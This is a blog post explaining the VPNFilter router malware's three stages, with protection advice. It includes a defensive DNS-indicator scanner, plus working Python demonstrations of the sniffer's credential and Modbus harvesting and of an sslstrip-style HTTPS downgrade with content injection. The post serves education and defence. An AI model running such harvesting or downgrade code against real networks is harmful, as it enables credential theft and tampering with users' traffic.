VPNFilter Malware – All You Need To Know

Josh Raduka, Senior Consultant, SecureITsource, Inc.

Nearly a month ago, malware with ties to the Russian government, known as VPNFilter, was publicly disclosed by Cisco Talos. Suspected to be state sponsored or affiliated, it infected what was originally thought to be 500,000 networking devices, though later reports put the number closer to one million. Its reach spans 54 countries, with devices manufactured by Netgear, TP-Link, Linksys, and MikroTik targeted first and ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE joining the list shortly after. A complete device list is maintained in Cisco Talos's published reports.

The malware infects SOHO (small office/home office) network devices, such as routers, as well as NAS (network-attached storage) devices. Yep, that box in the corner of the room with the flashy lights could be infected. These devices typically sit on the perimeter of a home network, and most lack the intrusion prevention systems (IPS) and malware protection found in the enterprise.

Recent research on the malware by Cisco Talos concludes that it has more advanced capabilities and better survival skills than other malware of this kind, making it unlike the rest. Composed of three stages, one of them deadly (for your router), the malware has yet to become a forgotten threat. Even the FBI's recommendation that consumers reboot their routers won't completely cleanse a device of VPNFilter, because the first stage survives a reboot.


Stage 1: This is the only stage that persists through a reboot, and its job is to locate the stage 2 deployment server, whose IP address changes. The infected device first tries to download an image from a Photobucket gallery, then from the ToKnowAll[.]com domain, and extracts the server's IP address from the GPS coordinates stored in the image's EXIF metadata. The ToKnowAll[.]com domain has since been seized by the FBI. If both attempts fail, stage 1 opens a listener and waits for a specially crafted trigger packet from the attacker that carries the IP address to use for stage 2.
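The two image sources above are the only network indicators stage 1 gives a defender before stage 2 arrives, so they are worth hunting for in resolver logs. The following is an added example (my code, not anything from VPNFilter or Talos) that scans dnsmasq-style query logs for those lookups; the log lines are constructed, and the severity labels are my own judgement: Photobucket is a legitimate image host, so a hit there alone is weak, while toknowall.com served no purpose other than stage 1.

```python
"""Scan resolver query logs for VPNFilter stage 1 lookups.

Added example, not VPNFilter code. Log lines are constructed in
dnsmasq's query-log format; the two domains are the stage 1 image
sources reported by Cisco Talos."""
import re
from collections import defaultdict

# Constructed sample log: one router (192.168.1.1) does the full
# stage 1 sequence, a second device hits only the seized domain,
# and a laptop does ordinary browsing.
SAMPLE_DNS_LOG = """\
Jun 20 09:14:02 gw dnsmasq[412]: query[A] photobucket.com from 192.168.1.1
Jun 20 09:14:03 gw dnsmasq[412]: query[A] s1.photobucket.com from 192.168.1.1
Jun 20 09:14:07 gw dnsmasq[412]: query[A] toknowall.com from 192.168.1.1
Jun 20 09:15:11 gw dnsmasq[412]: query[A] www.example.com from 192.168.1.20
Jun 20 09:16:40 gw dnsmasq[412]: query[A] ToKnowAll.com. from 192.168.1.30
"""

# Severity reflects how much legitimate traffic shares the name (my labels).
INDICATORS = {
    "toknowall.com": "high",
    "photobucket.com": "low",
}

QUERY_RE = re.compile(r"query\[\w+\]\s+(\S+)\s+from\s+(\S+)")


def normalize(name):
    """Lower-case and strip the trailing dot so suffix matching is exact."""
    return name.lower().rstrip(".")


def match_indicator(qname):
    """Return (domain, severity) for a matching indicator, else None.

    Matches the apex and any subdomain, but not look-alikes such as
    'nottoknowall.com'."""
    qname = normalize(qname)
    for domain, severity in INDICATORS.items():
        if qname == domain or qname.endswith("." + domain):
            return domain, severity
    return None


def scan_dns_log(log_text):
    """Map each querying client to the indicator domains it resolved."""
    hits = defaultdict(lambda: {"high": set(), "low": set()})
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname, client = m.groups()
        found = match_indicator(qname)
        if found:
            domain, severity = found
            hits[client][severity].add(domain)
    return dict(hits)


def suspected_clients(log_text):
    """Clients with at least one high-severity hit, sorted for reporting."""
    return sorted(client for client, h in scan_dns_log(log_text).items()
                  if h["high"])


if __name__ == "__main__":
    for client, h in scan_dns_log(SAMPLE_DNS_LOG).items():
        print(client, "high:", sorted(h["high"]), "low:", sorted(h["low"]))
    print("investigate:", suspected_clients(SAMPLE_DNS_LOG))
```

One caveat: stage 1 runs on the router itself, so if the router resolves names directly against the ISP's resolver the lookup never reaches a LAN-side DNS log; in that case a WAN-side firewall log or a packet capture is the place to look, and a query to the seized domain is still an indicator even though it now resolves to the FBI's sinkhole.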

Stage 2: Unlike stage 1, stages 2 and 3 do not persist through a reboot; however, a surviving stage 1 can fetch them again once the device comes back up. As Talos states, this stage “possesses capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data exfiltration and device management.” Basically, it is the stage that lets attackers execute commands and steal data. Research has shown VPNFilter is not trying to collect all data passing through the routers, but narrows its search to website credentials and Modbus SCADA (supervisory control and data acquisition) traffic. Modbus is an open, originally serial, communication protocol used to transfer data between industrial electronic devices; its Modbus TCP variant runs over TCP port 502, which is what a router in the path can observe. Some stage 2 variants also include a destructive capability (expanded on in stage 3) that overwrites part of the device's firmware and reboots it, turning the victim's device into a paperweight, probably killing the flashy lights. The larger threat is that this kill switch can be triggered on a massive scale, detaching hundreds of thousands of people from the internet simultaneously. That means no more online shopping. Well, maybe that is a good thing for some.
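To make the harvesting described above concrete, here is an added example (my code, not the malware's) of what a sniffer applying the reported filters would pull out of traffic passing through a router: basic-authentication credentials from plain HTTP requests and Modbus TCP headers on port 502. The sample packets are constructed; the 150-byte size filter follows the description of the stage 3 packet sniffer given below; the Modbus decoding is the standard MBAP header layout, not anything specific to VPNFilter.

```python
"""What a VPNFilter-style packet sniffer would harvest from passing traffic.

Added example, not VPNFilter code. Filters follow the reported behaviour
(TCP payloads over 150 bytes, HTTP basic authentication, Modbus TCP);
the sample packets are constructed."""
import base64
import re
import struct

MODBUS_TCP_PORT = 502
MIN_TCP_PAYLOAD = 150          # size filter reported for the sniffer module

# Constructed sample flows as (src_port, dst_port, tcp_payload).
SAMPLE_PACKETS = [
    # 1. A LAN user logging in to an IP camera over plain HTTP.
    (51000, 80,
     b"GET /admin HTTP/1.1\r\n"
     b"Host: cam.lan\r\n"
     b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n"
     b"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\r\n"
     b"Accept: text/html,application/xhtml+xml\r\n"
     b"Accept-Language: en-US,en;q=0.9\r\n"
     b"Connection: keep-alive\r\n"
     b"\r\n"),
    # 2. A Modbus TCP "Read Holding Registers" request to a PLC:
    #    MBAP header (tid=1, proto=0, len=6, unit=1), function 0x03,
    #    start register 0x006B, count 3.
    (51001, MODBUS_TCP_PORT, bytes.fromhex("0001000000060103006B0003")),
    # 3. A tiny basic-auth request that falls under the size threshold.
    (51002, 80,
     b"GET / HTTP/1.1\r\n"
     b"Host: t.lan\r\n"
     b"Authorization: Basic dGVzdDp0ZXN0\r\n"
     b"\r\n"),
]

BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I)


def parse_basic_auth(payload):
    """Return (user, password) from an HTTP basic-auth header, else None."""
    m = BASIC_RE.search(payload)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    user, _, password = raw.decode("utf-8", "replace").partition(":")
    return user, password


def parse_modbus_tcp(payload):
    """Decode the 7-byte MBAP header plus function code of a Modbus TCP PDU.

    Returns None unless the protocol id is 0 and the length field matches
    the bytes present, which weeds out other traffic that happens to use
    port 502."""
    if len(payload) < 8:
        return None
    tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    if proto != 0 or length != len(payload) - 6:
        return None
    return {
        "transaction_id": tid,
        "unit_id": unit,
        "function_code": payload[7],
        "data": payload[8:],
    }


def harvest(packets):
    """Apply the sniffer's filters and return what it would keep."""
    findings = []
    for src, dst, payload in packets:
        if MODBUS_TCP_PORT in (src, dst):
            mb = parse_modbus_tcp(payload)
            if mb:
                findings.append(("modbus", mb))
            continue
        if len(payload) <= MIN_TCP_PAYLOAD:   # "larger than 150 bytes"
            continue
        creds = parse_basic_auth(payload)
        if creds:
            findings.append(("basic_auth", creds))
    return findings


if __name__ == "__main__":
    for kind, detail in harvest(SAMPLE_PACKETS):
        print(kind, detail)
```

The third packet shows why the size filter is an attacker's efficiency choice and not something a defender can rely on: the credentials are just as exposed, the malware simply does not bother with short packets. The real fix is the one in the recommendations at the end of this post: don't administer devices over plain HTTP, and keep Modbus traffic off any network segment that a consumer router can see.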

Stage 3: Stage 3 consists of plugin modules that extend stage 2 with additional functionality. One of them, “ssler”, is the endpoint exploitation module: it sits in the path of traffic passing through the infected device on port 80 and acts as a man in the middle, injecting malicious content into web pages and delivering exploits to endpoints. It cannot decrypt HTTPS, so instead it prevents the upgrade: in the style of sslstrip, it rewrites https:// links to http:// in the pages it relays, keeping the victim's subsequent requests in clear text. In other words, network traffic on port 80 can be intercepted and injected with malicious code unbeknownst to the user. Another module, the packet sniffer, seeks out TCP packets larger than 150 bytes, looks for basic authentication credentials, and monitors SCADA (Modbus) communication as mentioned above. Stage 3 also includes a module that lets the malware communicate over Tor, so whatever the router steals travels to the attackers over an encrypted, anonymized channel.
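The downgrade trick is easier to defend against once you see how little it takes. Below is an added example (my code, not ssler's, and not a byte-exact reproduction of it) showing the generic sslstrip pattern Talos attributed to the module: the device strips the request headers that would make the response compressed or signal an HTTPS preference, rewrites every https:// link in the reply, and is free to append whatever it likes; the third function shows why a browser with the site in its HSTS store never gives the router a port-80 request to tamper with. The HTTP exchange and the host names are constructed.

```python
"""The sslstrip-style downgrade attributed to the ssler module, and why
HSTS defeats it.

Added example, not VPNFilter code: the header and link rewriting shown is
the generic sslstrip pattern, not a byte-exact reproduction of ssler."""
from urllib.parse import urlsplit

# Constructed port-80 exchange seen by a router sitting between a browser
# and a web shop. The shop serves login and checkout over HTTPS, but the
# user typed "shop.example" with no scheme and so started on plain HTTP.
CLIENT_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "\r\n"
)
SERVER_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<a href="https://shop.example/login">Log in</a>\n'
    '<form action="https://shop.example/checkout" method="post"></form>\n'
)

STRIPPED_REQUEST_HEADERS = ("accept-encoding:", "upgrade-insecure-requests:")


def mitm_request(request):
    """Attacker side, client -> server. Drop the headers that would make the
    body unreadable (compression) or tell the server the browser prefers
    HTTPS, so the reply comes back as plain, editable HTML."""
    head, sep, body = request.partition("\r\n\r\n")
    kept = [line for line in head.split("\r\n")
            if not line.lower().startswith(STRIPPED_REQUEST_HEADERS)]
    return "\r\n".join(kept) + sep + body


def mitm_response(response, inject=""):
    """Attacker side, server -> client. Rewrite every https:// link to
    http:// so the victim's next click stays on port 80, where the device
    can keep reading, and append any injected content. (A real proxy must
    also fix Content-Length after editing the body; omitted here.)"""
    head, sep, body = response.partition("\r\n\r\n")
    body = body.replace("https://", "http://") + inject
    return head + sep + body


def browser_will_send_plaintext(url, hsts_hosts):
    """Victim side. A browser that has the host in its HSTS store (preloaded,
    or learned from a Strict-Transport-Security header on an earlier TLS
    visit) rewrites http:// to https:// before the request leaves the
    machine, so there is no port-80 request for the router to tamper with."""
    parts = urlsplit(url)
    return parts.scheme == "http" and parts.hostname not in hsts_hosts


if __name__ == "__main__":
    print(mitm_request(CLIENT_REQUEST))
    print(mitm_response(SERVER_RESPONSE, inject="<!-- injected content -->\n"))
    for store in (set(), {"shop.example"}):
        print(sorted(store), "->",
              browser_will_send_plaintext("http://shop.example/login", store))
```

The practical takeaway for site owners is to send Strict-Transport-Security (and preload where possible); for users, it is to type https:// explicitly or bookmark the HTTPS address for anything that matters, since HSTS only helps once the browser has learned about the site.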

How can you protect yourself?

Defending against this type of attack is difficult because the affected devices have limited defensive capabilities of their own, and there is no simple way to confirm whether your router is infected. Despite these limitations, here are some recommendations and general security best practices to keep you safe.

  • While this could be a pain, resetting your router to factory defaults is the closest thing you have to a guarantee of removing any trace of VPNFilter. A reset does not close the hole the malware came in through, so apply the latest firmware immediately afterwards.
  • Reboot your router. Your ISP may have already performed a remote reboot, but rebooting the device yourself will ensure this task is complete. Simply unplug the power supply for 30 seconds, then plug it back in. If the device is infected, this clears stages 2 and 3 but leaves stage 1 in place, so it does not completely wipe out VPNFilter.
  • Contact the manufacturer or visit the manufacturer's website for preventative instructions, and make sure all patches have been applied and you are running the latest firmware, especially if your device is on the list.
  • Always change the default username and password used to administer your router.
  • Do not leave remote (WAN-side) administration enabled unless you require it.


While individuals, teams, and security-minded organizations continue to research the effects of this advanced malware, it is important to take note of the steps above and keep an eye on the growing list of manufacturers and devices. This will certainly not be the last malware of this magnitude we see, so it is important to stay current and informed regarding these attacks.

